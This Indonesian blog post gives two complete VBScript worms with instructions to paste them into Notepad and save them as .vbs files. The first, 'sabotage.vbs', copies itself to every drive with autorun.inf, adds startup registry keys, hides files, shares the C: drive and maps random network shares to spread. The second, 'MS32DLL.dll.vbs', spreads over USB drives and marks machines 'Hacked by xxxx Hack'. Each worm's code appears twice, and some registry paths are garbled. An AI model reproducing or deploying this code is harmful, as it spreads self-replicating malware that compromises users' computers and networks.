Virus ini sering menggandakan file-file anda tanpa anda ketahui...
Jadi Hati-hati...
Virus ini ada 2, jadi anda tinggal pilih mau Copy-paste yang mana...
Langkah-langkah Pembuatan :
- Buka Notepad
- Copy-paste atau kalau anda rajin ketik kode dibawah ini :
Worm 1
'54807463
On Error Resume Next
Dim Wshshell,Markas,fso,a,RG,raxa,raxb,raxc,raxd,rand,dot,drivecon,sharename,count
count = "0"
dot = "."
drivecon="0"
set wshnetwork = wscript.createobject("wscript.network")
Set Wshshell = Wscript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
RG = "Software\Microsoft\Windows\CurrentVersion"
Set Markas = fso.GetSpecialFolder(0)
SU = Wshshell.SpecialFolders("AllUsersStartUp")
SU = Replace(SU, "C:", "s:")
If fso.FileExists("autorun.inf") then
Wshshell.Run "explorer.exe "
End if
Wshshell.Run("net share system=C:\ /unlimited"), 0, true
Randomize
For i =1 to 8
r = int(rnd * 50) + 66
polm = polm & Chr(r)
next
polm = Chr(39) & polm & Chr(13) & Chr(10)
Set dropper = fso.OpenTextFile(Wscript.ScriptFullName, 1)
strRan = dropper.readline
src = dropper.readall
strRan = polm
randmat()
Do
If not fso.FileExists(Markas & "\sabotage.vbs") then
Set dropper = fso.CreateTextFile(Markas & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(Markas & "\sabotage.vbs").attributes = 39
Wshshell.Run "wscript.exe " & Markas & "\sabotage.vbs"
End if
Wshshell.RegWrite "HKLM" & RG & "\Run\WinSystem", Markas & "\sabotage.vbs"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\HideFileExt", "1", "REG_DWORD"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\HIDDEN", "0", "REG_DWORD"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\SHOWSUPERHIDDEN", "0", "REG_DWORD"
for each a in fso.drives
If a.isready then
fso.GetFile(a & "\sabotage.vbs").Attributes = 0
Set dropper = fso.CreateTextFile(a & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(a & "\sabotage.vbs").Attributes = 39
fso.GetFile(a & "\autorun.inf").Attributes = 0
Set auto = fso.CreateTextFile(a & "\autorun.inf", True)
auto.WriteLine("[autorun]")
auto.WriteLine("ShellExecute=wscript.exe sabotage.vbs")
auto.Close
fso.GetFile(a & "\autorun.inf").Attributes = 39
End if
next
If not Wscript.ScriptFullName = Markas & "\sabotage.vbs" then
Wscript.Quit
End if
do while drivecon = "0"
check()
shareformat()
wshnetwork.mapnetworkdrive "s:", sharename
enumdrives()
loop
copyfiles()
disconnect()
Wscript.Sleep 60000
Loop
function disconnect()
wshnetwork.removenetworkdrive "s:"
drivecon = "0"
end function
function copyfiles()
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile Wscript.ScriptFullName, SU & "\sab0tage.vbs"
end function
function check()
raxd = raxd + 1
if raxd = "255" then randmat()
end function
function shareformat()
sharename = "\" & raxa & dot & raxb & dot & raxc & dot & raxd & "\C"
end function
function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
drivecon = 1
else
' drivecon = 0
end if
Next
end function
function randum()
rand = int((254 * rnd) + 1)
end function
function randmat()
if count < 50 then
raxa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
raxa= rand
end if
randum()
raxb=rand
randum()
raxc=rand
raxd="1"
end function
On Error Resume Next
Dim Wshshell,Markas,fso,a,RG,raxa,raxb,raxc,raxd,rand,dot,drivecon,sharename,count
count = "0"
dot = "."
drivecon="0"
set wshnetwork = wscript.createobject("wscript.network")
Set Wshshell = Wscript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
RG = "Software\Microsoft\Windows\CurrentVersion"
Set Markas = fso.GetSpecialFolder(0)
SU = Wshshell.SpecialFolders("AllUsersStartUp")
SU = Replace(SU, "C:", "s:")
If fso.FileExists("autorun.inf") then
Wshshell.Run "explorer.exe "
End if
Wshshell.Run("net share system=C:\ /unlimited"), 0, true
Randomize
For i =1 to 8
r = int(rnd * 50) + 66
polm = polm & Chr(r)
next
polm = Chr(39) & polm & Chr(13) & Chr(10)
Set dropper = fso.OpenTextFile(Wscript.ScriptFullName, 1)
strRan = dropper.readline
src = dropper.readall
strRan = polm
randmat()
Do
If not fso.FileExists(Markas & "\sabotage.vbs") then
Set dropper = fso.CreateTextFile(Markas & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(Markas & "\sabotage.vbs").attributes = 39
Wshshell.Run "wscript.exe " & Markas & "\sabotage.vbs"
End if
Wshshell.RegWrite "HKLM" & RG & "\Run\WinSystem", Markas & "\sabotage.vbs"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\HideFileExt", "1", "REG_DWORD"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\HIDDEN", "0", "REG_DWORD"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\SHOWSUPERHIDDEN", "0", "REG_DWORD"
for each a in fso.drives
If a.isready then
fso.GetFile(a & "\sabotage.vbs").Attributes = 0
Set dropper = fso.CreateTextFile(a & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(a & "\sabotage.vbs").Attributes = 39
fso.GetFile(a & "\autorun.inf").Attributes = 0
Set auto = fso.CreateTextFile(a & "\autorun.inf", True)
auto.WriteLine("[autorun]")
auto.WriteLine("ShellExecute=wscript.exe sabotage.vbs")
auto.Close
fso.GetFile(a & "\autorun.inf").Attributes = 39
End if
next
If not Wscript.ScriptFullName = Markas & "\sabotage.vbs" then
Wscript.Quit
End if
do while drivecon = "0"
check()
shareformat()
wshnetwork.mapnetworkdrive "s:", sharename
enumdrives()
loop
copyfiles()
disconnect()
Wscript.Sleep 60000
Loop
function disconnect()
wshnetwork.removenetworkdrive "s:"
drivecon = "0"
end function
function copyfiles()
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile Wscript.ScriptFullName, SU & "\sab0tage.vbs"
end function
function check()
raxd = raxd + 1
if raxd = "255" then randmat()
end function
function shareformat()
sharename = "\" & raxa & dot & raxb & dot & raxc & dot & raxd & "\C"
end function
function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
drivecon = 1
else
' drivecon = 0
end if
Next
end function
function randum()
rand = int((254 * rnd) + 1)
end function
function randmat()
if count < 50 then
raxa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
raxa= rand
end if
randum()
raxb=rand
randum()
raxc=rand
raxd="1"
end function
Worm 2
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by xxxx Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by xxxx Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
Save Dengan Ekstensi (*.vbs)
- Setelah itu Save dengan extensi (*.vbs)
Tidak ada komentar:
Posting Komentar